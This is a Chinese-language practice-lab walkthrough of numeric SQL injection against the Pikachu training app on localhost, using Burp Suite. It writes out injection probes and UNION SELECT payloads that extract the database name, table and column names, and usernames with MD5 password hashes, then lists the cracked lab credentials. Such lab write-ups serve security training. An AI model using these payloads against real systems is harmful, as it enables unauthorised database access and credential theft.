输入?127.0.0.1/pikachu?选择sql注入(数字型)
2)打开foxy代理,输入值“1”进行bp抓包
3)将这个获取的包转发到Repeater中
4)用单引号“’”,判断有无注入点,再点击Send获取结果
5)输入id=1 and 1=2 返回结果报错
6)id=1 and 1=1 回显正常,存在注入点,验证了数字型注入。
判断返回结果有2列,返回3列报错,说明有2列
id=1’?union select database(),version()#
得到数据库名为pikachu
id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu'#
得到表名有:httpinfo,member,message,users,xssblind
id=1 union select group_concat(column_name),2 from information_schema.columns where table_name='users'#
id=1 union select username,password from users#
发现密码被md5加密了,我们通过md5在线转换网站(https://www.cmd5.com/)获得
对应账号和MD5加密的密码:
admin:e10adc3949ba59abbe56e057f20f883e(123456)
pikachu:670b14728ad9902aecba32e22fa4f6bd(000000)
test:e99a18c428cb38d5f260853678922e03(abc123)